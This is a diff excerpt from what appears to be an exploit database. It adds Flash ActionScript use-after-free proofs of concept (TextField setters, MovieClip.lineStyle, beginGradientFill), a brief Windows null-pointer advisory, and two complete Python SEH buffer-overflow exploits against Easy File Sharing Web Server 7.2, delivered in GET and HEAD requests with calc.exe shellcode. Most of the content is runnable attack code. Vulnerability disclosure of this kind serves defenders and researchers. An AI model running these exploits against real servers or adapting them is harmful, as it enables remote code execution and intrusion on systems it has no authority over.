+Note that multiple PoC executions and simulated system activity may be required to trigger this issue.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39027.zip
+

platforms/windows/dos/39019.txt

@@ -0,0 +1,48 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=560
+
+There is a use-after-free in the TextField antiAliasType setter. If it is set to an object with a toString method that frees the TextField, the property will be written after it is freed.
+
+A PoC is as follows:
+
+var toptf = this.createEmptyMovieClip("toptf", 1);
+
+
+function func(){
+	
+	toptf.removeMovieClip();	
+	trace("here");
+	return "advanced";
+}
+
+var o = {toString : func};
+
+
+var my_format:TextFormat = new TextFormat();
+my_format.font = "Times-12";
+
+var my_text1:TextField = toptf.createTextField("my_text1", toptf.getNextHighestDepth(), 9.5, 10, 400, 100);
+my_text1.text = "this.gridFitType = none";
+my_text1.embedFonts = true;
+my_text1.antiAliasType = o;
+my_text1.gridFitType = "none";
+my_text1.setTextFormat(my_format); 
+
+var my_text2:TextField = toptf.createTextField("my_text2", toptf.getNextHighestDepth(), 9.5, 40, 400, 100);
+my_text2.text = "this.gridFitType = advanced";
+my_text2.embedFonts = true;
+my_text2.antiAliasType = "advanced";
+my_text2.gridFitType = "pixel";
+my_text2.setTextFormat(my_format); 
+
+var my_text3:TextField = toptf.createTextField("my_text3", toptf.getNextHighestDepth(), 9.5, 70, 400, 100);
+my_text3.text = "this.gridFitType = subpixel";
+my_text3.embedFonts = true;
+my_text3.antiAliasType = "advanced";
+my_text3.gridFitType = "subpixel";
+my_text3.setTextFormat(my_format);
+
+A sample fla and swf are attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39019.zip
+

platforms/windows/dos/39020.txt

@@ -0,0 +1,49 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=559
+
+There is a use-after-free in the TextField gridFitType setter. If it is set to an object with a toString method that frees the TextField, the property will be written after it is freed.
+
+A PoC is as follows:
+
+var toptf = this.createEmptyMovieClip("toptf", 1);
+
+
+function func(){
+	
+	toptf.removeMovieClip();	
+	trace("here");
+	return "none";
+}
+
+var o = {toString : func};
+
+
+var my_format:TextFormat = new TextFormat();
+my_format.font = "Times-12";
+
+var my_text1:TextField = toptf.createTextField("my_text1", toptf.getNextHighestDepth(), 9.5, 10, 400, 100);
+my_text1.text = "this.gridFitType = none";
+my_text1.embedFonts = true;
+my_text1.antiAliasType = "advanced";
+my_text1.gridFitType = o;
+my_text1.setTextFormat(my_format); 
+
+var my_text2:TextField = toptf.createTextField("my_text2", toptf.getNextHighestDepth(), 9.5, 40, 400, 100);
+my_text2.text = "this.gridFitType = advanced";
+my_text2.embedFonts = true;
+my_text2.antiAliasType = "advanced";
+my_text2.gridFitType = "pixel";
+my_text2.setTextFormat(my_format); 
+
+var my_text3:TextField = toptf.createTextField("my_text3", toptf.getNextHighestDepth(), 9.5, 70, 400, 100);
+my_text3.text = "this.gridFitType = subpixel";
+my_text3.embedFonts = true;
+my_text3.antiAliasType = "advanced";
+my_text3.gridFitType = "subpixel";
+my_text3.setTextFormat(my_format);
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39020.zip
+

platforms/windows/dos/39021.txt

@@ -0,0 +1,21 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=558
+
+There are a number of use-after-frees in MovieClip.lineStyle. If any of the String parameters are an object with toString defined, the toString method can delete the MovieClip, which is subsequently used. A PoC is as follows:
+
+this.createEmptyMovieClip("triangle_mc", this.getNextHighestDepth());
+var o = {toString: func};
+triangle_mc.lineStyle(5, 0xff00ff, 100, true, o, "round", "miter", 1);
+
+function func(){
+	
+	triangle_mc.removeMovieClip();
+	return "none";
+	
+	}
+
+A sample swf and fla are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39021.zip
+

platforms/windows/dos/39022.txt

@@ -0,0 +1,47 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=557
+
+There are a number of use-after-free vulnerabilities in MovieClip.beginGradientFill. If the spreadMethod or any other string parameter is an object with toString defined, this method can free the MovieClip, which is then used. Note that many parameters to this function can be used to execute script and free the MovieClip during execution, it is recommended that this issues be fixed with a stale pointer check. 
+
+A PoC is as follows:
+
+this.createEmptyMovieClip("bmp_fill_mc", 1);
+with (bmp_fill_mc) {
+	
+	 colors = [0xFF0000, 0x0000FF];
+    fillType = "radial"
+    alphas = [100, 100];
+    ratios = [0, 0xFF];
+	var o = {toString: func};
+    spreadMethod = o;
+    interpolationMethod = "linearRGB";
+    focalPointRatio = 0.9;
+    matrix = new Matrix();
+    matrix.createGradientBox(100, 100, Math.PI, 0, 0);
+    beginGradientFill(fillType, colors, alphas, ratios, matrix, 
+        spreadMethod, interpolationMethod, focalPointRatio);
+    moveTo(100, 100);
+    lineTo(100, 300);
+    lineTo(300, 300);
+    lineTo(300, 100);
+    lineTo(100, 100);
+    endFill();
+}
+
+bmp_fill_mc._xscale = 200;
+bmp_fill_mc._yscale = 200;
+
+function func(){
+	
+	trace("in func");
+	var test = thiz.createTextField("test", 1, 1, 1, 10, 10);
+	trace(test);
+	test.removeTextField();
+	return "reflect";
+	}
+
+A sample swf and fla is attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39022.zip
+

platforms/windows/dos/39025.txt

@@ -0,0 +1,9 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=544
+
+The attached PoC triggers a null pointer vulnerability in OffsetChildren on Windows 7 32-bit. By mapping the null page an attacker can leverage this vulnerability to write to an arbitrary address.
+---
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39025.zip
+

platforms/windows/remote/39008.py

@@ -0,0 +1,57 @@
+# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
+# Date: 12/2/2015
+# Exploit Author: ArminCyber
+# Contact: Armin.Exploit@gmail.com
+# Version: 7.2
+# Tested on: XP SP3 EN
+# category: Remote Exploit
+# Usage: ./exploit.py ip port
+
+import socket
+import sys
+
+host = str(sys.argv[1])
+port = int(sys.argv[2])
+
+a = socket.socket()
+
+print "Connecting to: " + host + ":" + str(port)
+a.connect((host,port))
+
+entire=4500
+
+# Junk
+buff = "A"*4061
+
+# Next SEH
+buff+= "\xeb\x0A\x90\x90"
+
+# pop pop ret
+buff+= "\x98\x97\x01\x10"
+
+buff+= "\x90"*19
+
+# calc.exe
+# Bad Characters: \x20 \x2f \x5c
+shellcode = (
+"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
+"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
+"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
+"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
+"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
+"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
+"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
+"\x1c\x39\xbd"
+)
+buff+= shellcode
+
+buff+= "\x90"*7
+
+buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
+
+# GET
+a.send("GET " + buff + " HTTP/1.0\r\n\r\n")
+
+a.close()
+
+print "Done..."

platforms/windows/remote/39009.py

@@ -0,0 +1,57 @@
+# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
+# Date: 12/2/2015
+# Exploit Author: ArminCyber
+# Contact: Armin.Exploit@gmail.com
+# Version: 7.2
+# Tested on: XP SP3 EN
+# category: Remote Exploit
+# Usage: ./exploit.py ip port
+
+import socket
+import sys
+
+host = str(sys.argv[1])
+port = int(sys.argv[2])
+
+a = socket.socket()
+
+print "Connecting to: " + host + ":" + str(port)
+a.connect((host,port))
+
+entire=4500
+
+# Junk
+buff = "A"*4061
+
+# Next SEH
+buff+= "\xeb\x0A\x90\x90"
+
+# pop pop ret
+buff+= "\x98\x97\x01\x10"
+
+buff+= "\x90"*19
+
+# calc.exe
+# Bad Characters: \x20 \x2f \x5c
+shellcode = (
+"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
+"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
+"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
+"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
+"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
+"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
+"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
+"\x1c\x39\xbd"
+)
+buff+= shellcode
+
+buff+= "\x90"*7
+
+buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
+
+# HEAD
+a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n")
+
+a.close()
+
+print "Done..."